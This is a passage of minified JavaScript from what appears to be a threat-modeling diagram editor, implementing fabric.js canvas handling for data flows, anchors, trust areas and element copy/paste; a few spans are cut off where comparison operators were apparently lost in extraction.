te=this.getViewBaseElement(n[ot.ID]);this.flowUpdateFlowArrow(te.ID),this.flowUpdateText(n),this.Canvas.requestRenderAll()}),e[ot.myType]!=wt.GridLine&&(e.left<0&&(e.left=0,this.Canvas.requestRenderAll()),e.top<0&&(e.top=0,this.Canvas.requestRenderAll()),e.left+e.width>this.xMax&&e.left+e.width>this.Canvas.width&&(this.Canvas.setWidth(e.left+e.width),this.Canvas.requestRenderAll()),e.top+e.height>this.yMax&&e.top+e.height>this.Canvas.height&&(this.Canvas.setHeight(e.top+e.height),this.Canvas.requestRenderAll()))}onCanvasSelectionChanged(e){if(this.MouseMode!=Zs.Move){if(!this.blockSelectionChangedAfterReceive){if("selected"in e&&e.selected.length>0)if(1==e.selected.length){let i=e.selected[0];if(i[ot.fa])return void this.Canvas.discardActiveObject();if(i.group&&(i=i.group),i[ot.ID]){let n=this.getViewBaseElement(i[ot.ID]);this.SelectionChanged.emit(n),i[ot.elementTypeID]==Et.DataFlow&&this.setFlowSelected(i,!0)}else if(i[ot.flowID]){let n=this.getCanvasElementByCanvasID(i[ot.flowID]),r=this.getViewBaseElement(n[ot.ID]);this.SelectionChanged.emit(r),this.setFlowSelected(n,!0)}}else console.error("More than one object selected");else"deselected"in e&&(this.setFlowSelected(null,!1),this.SelectionChanged.emit(null));this.blockSelectionChangedAfterSend=!0,setTimeout(()=>{this.blockSelectionChangedAfterSend=!1},250)}}else this.mouseMovingState==gf.Moving&&(this.SetMouse(),this.mouseMovingState=gf.None,this.arrowVisibilityRestore())}onCanvasDrop(e){const i=e.e.dataTransfer.getData("dragDropData");if(i){let n=this.Canvas.viewportTransform;this.createElement(JSON.parse(i),(e.e.offsetX-n[4])/n[0],(e.e.offsetY-n[5])/n[0]),setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},250)}}onFlowAnchorHit(e){var i,n,r,c,d,T;if(!this.blockCreateLine){let k="",q=null;1==(null===(i=e.subTargets)||void 0===i?void 0:i.length)?(k=e.subTargets[0][ot.fa],q=e.target):(k=e.target[ot.fa],q=e.target.group);let Y=this.getFlowAnchorPoint(k,q);if(null==this.tmpFlowLine)this.tmpFlowLineEndpoint=q,this.tmpFlowLine=new Ei.fabric.Line([Y[0],Y[1],Y[0],Y[1]],{stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,hasControls:!1}),this.tmpFlowLine[ot.fa1]=k,this.Canvas.add(this.tmpFlowLine),this.Canvas.sendToBack(this.tmpFlowLine);else if(this.tmpFlowLineEndpoint[ot.canvasID]!=q[ot.canvasID]){const te=this.instantiateFlow();if(this.instanceOfCanvasFlow(te)){te.ArrowPos=this.FlowArrowPosition,te.BendFlow=this.BendFlow,te.ShowName=this.ShowName;let pe=this.createFlow(this.tmpFlowLine.x1,this.tmpFlowLine.y1,Y[0],Y[1],te);te.NameChanged.subscribe(Re=>this.changeObjectName(te.ID)),te.OutOfScopeChanged.subscribe(Re=>this.changeObjectBorder(te.ID)),null===(n=te.LineTypeChanged)||void 0===n||n.subscribe(Re=>this.flowChangeLineType(te.ID,Re)),null===(r=te.ArrowPosChanged)||void 0===r||r.subscribe(Re=>this.flowUpdateFlowArrow(te.ID)),null===(c=te.BendFlowChanged)||void 0===c||c.subscribe(Re=>this.flowChangeBending(te.ID,Re)),null===(d=te.DirectionChanged)||void 0===d||d.subscribe(Re=>this.flowChangeDirection(te.ID)),null===(T=te.AnchorChanged)||void 0===T||T.subscribe(Re=>this.flowChangeAnchor(te.ID,Re)),this.Diagram.Elements.AddChild(te),te.Sender=this.getViewBaseElement(this.tmpFlowLineEndpoint[ot.ID]),te.Receiver=this.getViewBaseElement(q[ot.ID]),pe[ot.fa1]=this.tmpFlowLine[ot.fa1],pe[ot.fe1]=this.tmpFlowLineEndpoint[ot.canvasID],this.tmpFlowLineEndpoint[ot.dfs]||(this.tmpFlowLineEndpoint[ot.dfs]=[]),this.tmpFlowLineEndpoint[ot.dfs].push(pe[ot.canvasID]),pe[ot.fa2]=k,pe[ot.fe2]=q[ot.canvasID],q[ot.dfs]||(q[ot.dfs]=[]),q[ot.dfs].push(pe[ot.canvasID]),this.tmpFlowLineEndpoint=null,this.Canvas.remove(this.tmpFlowLine),this.tmpFlowLine=null,this.Canvas.requestRenderAll(),this.setFlowSelected(pe,!0),this.SelectionChanged.emit(te),this.onCanvasModified()}}}}deleteElement(e){if(null==e)return;let i=null,n=this.Canvas.getObjects().find(r=>r[ot.ID]==e);if(n){if((n[ot.elementTypeID]==Et.DataFlow||n[ot.flowID])&&(i=n[ot.elementTypeID]==Et.DataFlow?n:this.getCanvasElementByCanvasID(n[ot.flowID])),i?(this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.p0ID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.p1ID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.p2ID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.arrowEID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.arrowSID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.textID])),this.Canvas.getObjects().filter(c=>null!=c[ot.dfs]).forEach(c=>{const d=c[ot.dfs].indexOf(i[ot.canvasID]);d>=0&&c[ot.dfs].splice(d,1)}),this.Canvas.remove(i)):(n._objects&&n._objects.filter(c=>"group"==c.type).forEach(c=>this.Canvas.remove(c)),this.Canvas.remove(n)),n[ot.t0ID]){const c=this.getCanvasElementByCanvasID(n[ot.t0ID]);c&&this.Canvas.remove(c)}let r=this.getViewBaseElement(e);r&&this.instanceOfElementType(r)&&(r.Parent.DeleteChild(r),this.Canvas.getObjects().filter(c=>c[ot.ID]==e).forEach(c=>{this.Canvas.remove(c),this.Diagram.Elements.DeleteChild(r)})),r instanceof Ou&&this.NavTreeChanged.emit(),this.onCanvasModified()}}setFlowSelected(e,i){var n,r,c;let d=i?1:0;if(this.seletedFlow){let T=this.seletedFlow;this.seletedFlow=null,this.setFlowSelected(T,!1)}if(e){this.seletedFlow=e,null===(n=this.getCanvasElementByCanvasID(e[ot.p0ID]))||void 0===n||n.set("opacity",d);let T=this.getViewBaseElement(e[ot.ID]);(0==d||this.instanceOfCanvasFlow(T)&&T.BendFlow)&&(null===(r=this.getCanvasElementByCanvasID(e[ot.p1ID]))||void 0===r||r.set("opacity",d)),i&&this.getCanvasElementByCanvasID(e[ot.p1ID])&&this.Canvas.bringToFront(this.getCanvasElementByCanvasID(e[ot.p1ID])),null===(c=this.getCanvasElementByCanvasID(e[ot.p2ID]))||void 0===c||c.set("opacity",d),this.Canvas.requestRenderAll()}}createFlow(e,i,n,r,c){let d=e,T=i,k=n-e,q=r-i;const Y=Math.PI/2-Math.acos(k/Math.sqrt(k*k+q*q)),te=this.BendFlow?50:0,pe=k/2+Math.sign(q)*te*Math.cos(Y),Re=q/2-te*Math.sin(Y);let Fe=null;this.instanceOfCanvasFlow(c)?Fe=c:console.error("Element is not a flow object",c);let Ne=["M",d.toString(),T.toString(),"q",pe.toString(),Re.toString(),k.toString(),q.toString()].join(" "),et=new Ei.fabric.Path(Ne,{fill:"",stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,objectCaching:!1,canvasID:Fo(),selectable:!0,lockMovementX:!0,lockMovementY:!0,lockScalingX:!0,lockScalingY:!0,hasBorders:!1,transparentCorners:!0,cornerColor:"transparent",ID:c.ID,elementTypeID:Et.DataFlow,myType:wt.DataFlowLine,bendFlow:this.BendFlow,perPixelTargetFind:!0});et.setControlsVisibility({mtr:!1,mts:!1});let ut=this.flowCreateText(e,i,n,r,e+pe,i+Re,c.GetProperty("Name"));ut[ot.visible]=Fe.ShowName,et[ot.textID]=ut[ot.canvasID],ut[ot.flowID]=et[ot.canvasID];let Ze=new Ei.fabric.Path("M 15 0 L 10 5 L 10 -5 z",{fill:this.StrokeColor,stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,objectCaching:!1,originX:"center",originY:"center",canvasID:Fo(),selectable:!1,myType:wt.DataFlowArrowE});Ze.setControlsVisibility({mtr:!1,mts:!1}),et[ot.arrowEID]=Ze[ot.canvasID],Ze[ot.flowID]=et[ot.canvasID],Ze[ot.visible]=Fe.ArrowPos!=wn.Start;let yt=new Ei.fabric.Path("M 15 0 L 10 5 L 10 -5 z",{fill:Fe.ArrowPos==wn.Both?this.StrokeColor:this.BackgroundColor,stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,objectCaching:!1,originX:"center",originY:"center",canvasID:Fo(),selectable:!1,myType:wt.DataFlowArrowS});yt.setControlsVisibility({mtr:!1,mts:!1}),et[ot.arrowSID]=yt[ot.canvasID],yt[ot.flowID]=et[ot.canvasID],yt[ot.visible]=Fe.ArrowPos!=wn.End;let It=this.flowCreateCurvePoint("p1",et.path[1][1],et.path[1][2],et);et[ot.p1ID]=It[ot.canvasID],It[ot.flowID]=et[ot.canvasID],It[ot.visible]=this.BendFlow;let St=this.flowCreateCurveCircle("p0",et.path[0][1],et.path[0][2],et);et[ot.p0ID]=St[ot.canvasID],St[ot.flowID]=et[ot.canvasID];let Nt=this.flowCreateCurveCircle("p2",et.path[1][3],et.path[1][4],et);return et[ot.p2ID]=Nt[ot.canvasID],Nt[ot.flowID]=et[ot.canvasID],this.Canvas.add(et),this.Canvas.add(Ze),this.Canvas.add(yt),this.Canvas.add(ut),this.Canvas.add(It),this.Canvas.add(St),this.Canvas.add(Nt),this.Canvas.sendToBack(ut),this.Canvas.bringToFront(It),setTimeout(()=>{this.flowUpdateFlowArrow(c.ID)},100),et}flowCreateCurveCircle(e,i,n,r){var c=new Ei.fabric.Circle({left:i,top:n,radius:6.5,stroke:this.theme.Primary,fill:this.theme.Primary,originX:"center",originY:"center",name:e,canvasID:Fo(),myType:wt.DataFlowCircle,selectable:!1,hasBorders:!1,hasControls:!1});return c[ot.flowID]=r[ot.canvasID],c.setControlsVisibility({mtr:!1,mts:!1}),c}flowCreateCurvePoint(e,i,n,r){var c=new Ei.fabric.Circle({left:i,top:n,radius:7,stroke:this.theme.Primary,fill:this.theme.Primary,originX:"center",originY:"center",name:e,canvasID:Fo(),myType:wt.DataFlowPoint,selectable:!0,hasBorders:!1,hasControls:!1});return c[ot.flowID]=r[ot.canvasID],c.setControlsVisibility({mtr:!1,mts:!1}),c}flowCreateText(e,i,n,r,c,d,T){let k=e,q=i,Y=n-e,te=r-i,pe=c-k,Re=d-q;const Fe=Math.PI/2-Math.acos(Y/Math.sqrt(Y*Y+te*te));let Ne=pe<0?pe*Math.PI/4:0;Yr[ot.ID]==e);n&&n[ot.myType]==wt.DataFlowLine&&(i==ed.Dashed?n.set(ot.strokeDashArray,[5,5]):delete n[ot.strokeDashArray]),this.Canvas.requestRenderAll(),this.onCanvasModified()}flowChangeBending(e,i){const n=this.getCanvasElementByID(e);n[ot.bendFlow]=i;let r=this.getCanvasElementByCanvasID(n[ot.p1ID]);if(0==n[ot.bendFlow]){let k=n.path[0][2]+(n.path[1][4]-n.path[0][2])/2;r.left=n.path[1][1]=n.path[0][1]+(n.path[1][3]-n.path[0][1])/2,r.top=n.path[1][2]=k,r.set(ot.visible,!1),r.set(ot.opacity,0)}else{const T=n.path[0][1],k=n.path[0][2];let te=T,pe=k,Re=n.path[1][3]-T,Fe=n.path[1][4]-k;const Ne=Math.PI/2-Math.acos(Re/Math.sqrt(Re*Re+Fe*Fe)),et=50,ut=Re/2+Math.sign(Fe)*et*Math.cos(Ne),Ze=Fe/2-et*Math.sin(Ne);r.left=n.path[1][1]=te+ut,r.top=n.path[1][2]=pe+Ze,r.set(ot.visible,!0),r.set(ot.opacity,1)}let c=n._calcDimensions();n.set({width:c.width,height:c.height,left:c.left,top:c.top,pathOffset:{x:c.width/2+c.left,y:c.height/2+c.top},dirty:!0}),n.setCoords();let d=this.getViewBaseElement(n[ot.ID]);this.flowUpdateFlowArrow(d.ID),this.flowUpdateText(n),this.Canvas.requestRenderAll()}flowChangeDirection(e){const i=this.getCanvasElementByID(e),n=this.getViewBaseElement(e),r=this.getFlowAnchorPoint(i[ot.fa2],this.getCanvasElementByCanvasID(i[ot.fe2])),c=this.getFlowAnchorPoint(i[ot.fa1],this.getCanvasElementByCanvasID(i[ot.fe1])),d=this.createFlow(r[0],r[1],c[0],c[1],n);d[ot.fa1]=i[ot.fa2],d[ot.fe1]=i[ot.fe2],d[ot.fa2]=i[ot.fa1],d[ot.fe2]=i[ot.fe1],this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.p0ID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.p1ID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.p2ID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.arrowEID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.arrowSID])),this.Canvas.remove(this.getCanvasElementByCanvasID(i[ot.textID])),[ot.ID,ot.elementTypeID,ot.myType,ot.strokeDashArray,ot.bendFlow,ot.fontSize].forEach(q=>{d.set(q,i[q])});const k=i[ot.canvasID];this.getCanvasElementByCanvasID(d[ot.arrowSID])[ot.flowID]=k,this.getCanvasElementByCanvasID(d[ot.arrowEID])[ot.flowID]=k,this.getCanvasElementByCanvasID(d[ot.p0ID])[ot.flowID]=k,this.getCanvasElementByCanvasID(d[ot.p1ID])[ot.flowID]=k,this.getCanvasElementByCanvasID(d[ot.p2ID])[ot.flowID]=k,d[ot.canvasID]=k,this.Canvas.remove(i),this.flowChangeBending(n.ID,n.BendFlow),this.flowUpdateText(d),this.flowUpdateFlowArrow(n.ID),this.Canvas.requestRenderAll(),this.setFlowSelected(d,!0),this.SelectionChanged.emit(n),this.onCanvasModified()}flowChangeAnchor(e,i){const n=this.getCanvasElementByID(e);n[ot.fa+i.o]=i.fa,this.onMovingObject(this.getCanvasElementByCanvasID(n["fe"+i.o]))}dfOnPointMoving(e){let i=this.getCanvasElementByCanvasID(e[ot.flowID]);"p1"==e.name&&(i.path[1][1]=e.left,i.path[1][2]=e.top);let n=i._calcDimensions();i.set({width:n.width,height:n.height,left:n.left,top:n.top,pathOffset:{x:n.width/2+n.left,y:n.height/2+n.top},dirty:!0}),i.setCoords(),this.flowUpdateFlowArrow(i[ot.ID]),this.flowUpdateText(i)}createFlowAnchors(e,i,n=!0,r=!0,c=!1,d=!1){if(this.Diagram.DiagramType==xn.Hardware)return[];let T=6.5,k=13,Y=[];const te=(pe,Re,Fe)=>{let Ne=new Ei.fabric.Circle({left:pe,top:Re,radius:T,fill:this.StrokeColor,opacity:.15});const et=pe+T,ut=Re+T,Ze=4.33;let yt=new Ei.fabric.Line([et-Ze,ut-Ze,et+Ze,ut+Ze],{stroke:this.theme.Primary,selectable:!1}),It=new Ei.fabric.Line([et-Ze,ut+Ze,et+Ze,ut-Ze],{stroke:this.theme.Primary,selectable:!1});return new Ei.fabric.Group([Ne,yt,It],{left:pe,top:Re,hasControls:!1,hasBorders:!1,lockRotation:!0,opacity:0,fa:Fe,myType:wt.FlowAnchor,canvasID:Fo()})};return n&&(Y.push(te(e-k-3,i/2-T,_i.East)),Y.push(te(T,i/2-T,_i.West))),r&&(Y.push(te(e/2-T,T,_i.North)),Y.push(te(e/2-T,i-k-3,_i.South))),c&&(Y.push(te(e-k-3,i/4-T,_i.EasternNorth)),Y.push(te(e-k-3,3*i/4-T,_i.EasternSouth)),Y.push(te(T,i/4-T,_i.WesternNorth)),Y.push(te(T,3*i/4-T,_i.WesternSouth)),Y.push(te(3*e/4-T,T,_i.NorthernEast)),Y.push(te(e/4-T,T,_i.NorthernWest)),Y.push(te(3*e/4-T,i-k-3,_i.SouthernEast)),Y.push(te(e/4-T,i-k-3,_i.SouthernWest))),d&&(Y.push(te(e-k-3,T,_i.NorthEast)),Y.push(te(T,T,_i.NorthWest)),Y.push(te(e-k-3,i-k-3,_i.SouthEast)),Y.push(te(T,i-k-3,_i.SouthWest))),Y.forEach(pe=>{pe.on("mousedown",Re=>{this.onFlowAnchorHit(Re)})}),Y}getFlowAnchorPoint(e,i){return e==_i.North?[i.left+i.width/2,i.top]:e==_i.East?i[ot.elementTypeID]==Et.PhysicalLink?[i.left+i.width-i.width/14,i.top+i.height/2]:[i.left+i.width,i.top+i.height/2]:e==_i.South?[i.left+i.width/2,i.top+i.height]:e==_i.West?i[ot.elementTypeID]==Et.PhysicalLink?[i.left+i.width/14,i.top+i.height/2]:[i.left,i.top+i.height/2]:e==_i.NorthernEast?[i.left+3*i.width/4,i.top]:e==_i.NorthernWest?[i.left+i.width/4,i.top]:e==_i.SouthernEast?[i.left+3*i.width/4,i.top+i.height]:e==_i.SouthernWest?[i.left+i.width/4,i.top+i.height]:e==_i.EasternNorth?[i.left+i.width,i.top+i.height/4]:e==_i.EasternSouth?[i.left+i.width,i.top+3*i.height/4]:e==_i.WesternNorth?[i.left,i.top+i.height/4]:e==_i.WesternSouth?[i.left,i.top+3*i.height/4]:e==_i.NorthEast?[i.left+i.width,i.top]:e==_i.NorthWest?[i.left,i.top]:e==_i.SouthEast?[i.left+i.width,i.top+i.height]:e==_i.SouthWest?[i.left,i.top+i.height]:null}textOnMovingPoint(e){let i=this.getCanvasElementByCanvasID(e[ot.textObjID]);if(!i)return void this.Canvas.remove(e);let n=i._objects.find(r=>r[ot.myType]==wt.ElementName);n.set("left",e.left-(i.left+i.width/2)),n.set("top",e.top-(i.top+i.height/2-8)),this.Canvas.requestRenderAll()}textOnMovingText(e){let i=this.getCanvasElementByCanvasID(e[ot.t0ID]),n=e._objects.find(r=>r[ot.myType]==wt.ElementName);i.set("left",e.left+e.width/2+n.left),i.set("top",e.top+e.height/2+n.top-8),this.Canvas.requestRenderAll()}onScaleElement(e){let i=e.transform.target,n=i._objects.find(pe=>pe[ot.myType]==wt.ElementType),r=i._objects.find(pe=>pe[ot.myType]==wt.ElementPhyElement),d=(i._objects.find(pe=>pe[ot.myType]==wt.ElementName),i.width*i.scaleX),T=i.height*i.scaleY;i.set({height:T,width:d,scaleX:1,scaleY:1}),n&&n.set({left:0,top:-T/2+5}),r&&r.set({left:0,top:T/2-15});let k=i._objects.filter(pe=>null!=pe[ot.fa]),q=6.5,Y=13;k.forEach(pe=>{pe[ot.fa]==_i.East?pe.set({left:d/2-Y-6,top:-q}):pe[ot.fa]==_i.West?pe.set({left:-d/2+q,top:-q}):pe[ot.fa]==_i.North?pe.set({left:-q,top:-T/2+q}):pe[ot.fa]==_i.South?pe.set({left:-q,top:T/2-Y-6}):pe[ot.fa]==_i.EasternNorth?pe.set({left:d/2-Y-6,top:-T/4}):pe[ot.fa]==_i.EasternSouth?pe.set({left:d/2-Y-6,top:T/4-Y}):pe[ot.fa]==_i.WesternNorth?pe.set({left:-d/2+q,top:-T/4}):pe[ot.fa]==_i.WesternSouth?pe.set({left:-d/2+q,top:T/4-Y}):pe[ot.fa]==_i.NorthernEast?pe.set({left:d/4-Y,top:-T/2+q}):pe[ot.fa]==_i.NorthernWest?pe.set({left:-d/4,top:-T/2+q}):pe[ot.fa]==_i.SouthernEast?pe.set({left:d/4-Y,top:T/2-Y-6}):pe[ot.fa]==_i.SouthernWest?pe.set({left:-d/4,top:T/2-Y-6}):pe[ot.fa]==_i.NorthEast?pe.set({left:d/2-Y-6,top:-T/2+q}):pe[ot.fa]==_i.NorthWest?pe.set({left:-d/2+6,top:-T/2+q}):pe[ot.fa]==_i.SouthEast?pe.set({left:d/2-Y-6,top:T/2-Y-6}):pe[ot.fa]==_i.SouthWest&&pe.set({left:-d/2+6,top:T/2-Y-6}),pe.setCoords()})}fireScaling(e){e.fire("scaling",{transform:{target:e}})}getCanvasElementByID(e){return this.Canvas.getObjects().find(i=>i[ot.ID]==e)}getCanvasElementByCanvasID(e){return this.Canvas.getObjects().find(i=>i[ot.canvasID]==e)}changeObjectType(e,i){let n=this.Canvas.getObjects().find(r=>r[ot.ID]==e);if(n._objects){let r=n._objects.find(c=>c[ot.myType]==wt.ElementType);r&&(r.text="\xab"+i+"\xbb",n.dirty=!0,this.Canvas.requestRenderAll(),this.onCanvasModified())}else if(n[ot.textID]){let r=this.getCanvasElementByCanvasID(n[ot.textID]);r.text="\xab"+i+"\xbb",r.dirty=!0,this.Canvas.requestRenderAll(),this.onCanvasModified()}}changeObjectPhysicalElement(e,i){const n=this.Canvas.getObjects().find(r=>r[ot.ID]==e);if(n._objects){let r=n._objects.find(c=>c[ot.myType]==wt.ElementPhyElement);if(r)r.text=i?i.GetProperty("Name"):"",n.dirty=!0,this.Canvas.requestRenderAll(),this.onCanvasModified();else{const c=new Ei.fabric.Text(i?i.GetProperty("Name"):"",{fontSize:this.currentFontSizeConfig.Type,fill:this.theme.Primary,originX:"center",left:0,top:n.height/2-15,myType:wt.ElementPhyElement});n[ot.elementTypeID]==Et.LogTrustArea&&(c[ot.originX]="left",c[ot.originY]="top",c.set({left:-n.width/2+5,top:-n.height/2+35})),n.add(c),this.Canvas.requestRenderAll(),this.onCanvasModified()}}else if(n[ot.textID]){let r=this.getCanvasElementByCanvasID(n[ot.textID]);r.text=i?i.GetProperty("Name"):"",r.dirty=!0,this.Canvas.requestRenderAll(),this.onCanvasModified()}}changeObjectName(e){var i;let n=this.getCanvasElementByID(e),r=this.getViewBaseElement(e),c=null;if(n._objects?c=n._objects.find(d=>d[ot.myType]==wt.ElementName):n[ot.myType]==wt.DataFlowLine&&(c=this.Canvas.getObjects().find(d=>d[ot.myType]==wt.ElementName&&d[ot.flowID]==n[ot.canvasID])),c&&r){if(c.text=null!=r.Ref?r.Ref.NameRaw:r.NameRaw,r instanceof M2||r instanceof rs){if(r.FlowType==Xs.Extend?c.text="\xabextend\xbb":r.FlowType==Xs.Include&&(c.text="\xabinclude\xbb"),c.styles&&delete c.styles[0],r instanceof rs&&r.ShowProtocolDetails){if((null===(i=r.ProtocolStack)||void 0===i?void 0:i.length)>0&&(c.text=c.text+" ("+r.ProtocolStack.map(d=>d.NameRaw).join(", ")+")"),r.SenderInterface){c.text=r.SenderInterface.Name+": "+c.text,(!c.styles||!c.styles[0])&&(c.styles={0:{}});for(let d=0;d"Name"==T.ID):r.GetProperties().find(T=>"Name"==T.ID),d.Type==Ii.TextArea&&c.set("top",-c.height/2)}c.set("dirty",!0),this.Canvas.requestRenderAll()}}changeObjectBorder(e){const i=this.getCanvasElementByID(e),n=this.getViewBaseElement(e);let r=null;i._objects?r=i._objects.find(c=>c[ot.myType]==wt.ElementBorder):i[ot.myType]==wt.DataFlowLine&&(r=i),r&&n&&(n.OutOfScope?r.set("strokeDashArray",[2,2]):i[ot.myType]==wt.TrustArea?r.set("strokeDashArray",[10,5]):delete r.strokeDashArray,r.set("dirty",!0),this.Canvas.requestRenderAll())}changeFontSize(){this.Canvas.getObjects().forEach(e=>{let i=null,n=null,r=null;e._objects?(i=e._objects.find(c=>c[ot.myType]==wt.ElementType),r=e._objects.find(c=>c[ot.myType]==wt.ElementPhyElement),n=e._objects.find(c=>c[ot.myType]==wt.ElementName)):e[ot.myType]==wt.DataFlowLine&&(n=this.getCanvasElementByCanvasID(e[ot.textID])),n&&n.set(ot.fontSize,e[ot.myType]!=wt.TrustArea?this.currentFontSizeConfig.Name:this.currentFontSizeConfig.Type),i&&i.set(ot.fontSize,this.currentFontSizeConfig.Type),r&&r.set(ot.fontSize,this.currentFontSizeConfig.Type)}),this.Canvas.requestRenderAll(),this.onCanvasModified()}renderIcon(e,i,n,r,c){e.save(),e.translate(i,n),e.rotate(Ei.fabric.util.degreesToRadians(c.angle));let k=document.createElement("img");k.src="data:image/svg+xml,%3C%3Fxml version='1.0' encoding='utf-8'%3F%3E%3C!DOCTYPE svg PUBLIC '-//W3C//DTD SVG 1.1//EN' 'http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd'%3E%3Csvg version='1.1' id='Ebene_1' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x='0px' y='0px' width='595.275px' height='595.275px' viewBox='200 215 230 470' xml:space='preserve'%3E%3Ccircle style='fill:%23F44336;' cx='299.76' cy='439.067' r='218.516'/%3E%3Cg%3E%3Crect x='267.162' y='307.978' transform='matrix(0.7071 -0.7071 0.7071 0.7071 -222.6202 340.6915)' style='fill:white;' width='65.545' height='262.18'/%3E%3Crect x='266.988' y='308.153' transform='matrix(0.7071 0.7071 -0.7071 0.7071 398.3889 -83.3116)' style='fill:white;' width='65.544' height='262.179'/%3E%3C/g%3E%3C/svg%3E",e.drawImage(k,-12,-12,24,24),e.restore()}checkIntersection(){this.blockCheckingIntersection||(this.blockCheckingIntersection=!0,setTimeout(()=>{this.intersectionPairs.forEach(n=>n[2]=0);let e=[],i=this.Canvas.getObjects();for(let n=0;nY[ot.elementTypeID]==Et.LogTrustArea||Y[ot.elementTypeID]==Et.PhyTrustArea,k=null,q=null;T(c)&&T(d)?c.width*c.height>d.width*d.height?(k=c,q=d):(k=d,q=c):T(c)?(k=c,q=d):T(d)&&(k=d,q=c),k&&(e.some(Y=>Y.key==q)||e.push({key:q,value:[]}),e.find(Y=>Y.key==q).value.push(k))}}e.forEach(n=>{let r=n.value[0];n.value.length>1&&(r=n.value.find(d=>d.width*d.height==Math.min(...n.value.map(T=>T.width*T.height))));let c=this.getViewBaseElement(r[ot.ID]);if(c&&this.instanceOfContainer(c)){let d=this.getViewBaseElement(n.key[ot.ID]);if(d){c.AddChild(d);const T=this.intersectionPairs.find(k=>k[0][ot.ID]==r[ot.ID]&&k[1][ot.ID]==n.key[ot.ID]);T?T[2]=1:this.intersectionPairs.push([r,n.key,1])}}});for(let n=0;n{c[ot.myType]!=wt.GridLine&&(c.aCoords.tl.xi&&(i=c.aCoords.br.x),c.aCoords.tl.yr&&(r=c.aCoords.br.y))}),e-=5,n-=5,i+=5,r+=5,this.xMax=i,this.yMax=r,[e,n,i,r]}setCanvasColor(){if(this.Canvas.backgroundColor!=this.BackgroundColor){this.Canvas.backgroundColor=this.BackgroundColor,Ei.fabric.Object.prototype.cornerColor=this.StrokeColor;let e=n=>{if(n.stroke&&n.stroke!=this.theme.Primary&&n.set("stroke",this.StrokeColor),n.fill&&n.fill!=this.theme.Primary){let r="";"white"==n.fill?r="black":"black"==n.fill||"rgb(0,0,0)"==n.fill?r="white":"transparent"==n.fill?r=n.fill:n.fill==t.BackgroundColorDark?r=t.BackgroundColorLight:n.fill==t.BackgroundColorLight?r=t.BackgroundColorDark:console.log("obj fill",n.fill),n.set("fill",r)}if(n.cornerColor&&n.cornerColor!=this.theme.Primary){let r="";"transparent"==n.cornerColor?r="transparent":"white"==n.cornerColor?r="black":"black"==n.cornerColor?r="white":console.log("cornerColor",n.cornerColor),n.set("cornerColor",r)}},i=n=>{n.forEach(r=>{e(r),r._objects&&i(r._objects)})};i(this.Canvas.getObjects()),this.Canvas.renderAll()}}instanceOfCanvasFlow(e){return e instanceof rs||e instanceof M2}instanceOfContainer(e){return e instanceof zm||e instanceof Ys||e instanceof sf}instanceOfElementType(e){return e instanceof os||e instanceof lc}}return t.BackgroundColorDark="#1E1E1E",t.BackgroundColorLight="#FFFFFF",t.GridSize=20,t})();class $T extends D2{CopyElement(){this.SelectedElement instanceof td||this.SelectedElement instanceof zm||this.SelectedElement instanceof rs||(this.copyID=this.SelectedElement.ID)}PasteElement(){if(!this.copyID)return;const a=this.getViewBaseElement(this.copyID),e=this.getCanvasElementByID(this.copyID);if(a){const i=this.createElement({stencilRef:{name:"",stencilID:a.GetProperty("Type").ID}},e.left+e.width+10,e.top);i.CopyFrom(a.Data),i.Name+="-Copy";const n=this.getCanvasElementByID(i.ID);n.set("width",e.width),n.set("height",e.height),this.fireScaling(n),this.copyID=null}}initializeCanvas(a){var e;if(!super.initializeCanvas(a))return!1;if(!this.Diagram.Canvas&&this.Diagram.DiagramType==xn.Hardware){let i=this.dataService.Config.GetStencilTypes().find(c=>c.ElementTypeID==Et.PhyTrustArea&&"Device Casing"==c.Name);i||(i=this.dataService.Config.GetStencilTypes().find(c=>c.IsDefault&&c.ElementTypeID==Et.PhyTrustArea));const n=this.createElement({stencilRef:{name:"",stencilID:i.ID}},5,5);let r=this.getCanvasElementByID(n.ID);n.Name=(null===(e=this.dataService.Project.FindDeviceOfDiagram(this.Diagram))||void 0===e?void 0:e.Name)+"'s Casing",r.set("scaleX",(a.clientWidth-200)/r.width),r.set("scaleY",(a.clientHeight-100)/r.height),this.fireScaling(r),setTimeout(()=>{this.SendToBack(),this.SelectedElement=null},100)}return this.dataService.Project.DFDElementsChanged.subscribe(i=>{i.Type==Ja.Removed&&this.deleteElement(i.ID)}),!0}instantiateFlow(){return lc.Instantiate(rs.GetDefaultType(this.dataService.Config),this.dataService.Project,this.dataService.Config)}createElement(a,e,i){let n,r;if(a.stencilRef.stencilID)n=this.dataService.Config.GetStencilType(a.stencilRef.stencilID),r=lc.Instantiate(n,this.dataService.Project,this.dataService.Config),n.Name!=a.stencilRef.name&&(r.Name=Gi.FindUniqueName(a.stencilRef.name,this.getViewBaseElements().map(k=>k.Name)));else if(a.stencilRef.elementID)n=this.dataService.Project.GetDFDElement(a.stencilRef.elementID).GetProperty("Type"),r=td.InstantiateRef(this.dataService.Project.GetDFDElement(a.stencilRef.elementID),this.dataService.Project,this.dataService.Config);else if(a.stencilRef.templateID){let k=this.dataService.Config.GetStencilTypeTemplate(a.stencilRef.templateID);for(let q=0;qpe!=r).map(pe=>pe.Name));let te=this.getCanvasElementByID(r.ID);te.set("scaleX",k.Layout[q].width/te.width),te.set("scaleY",k.Layout[q].height/te.height),this.fireScaling(te)}}return 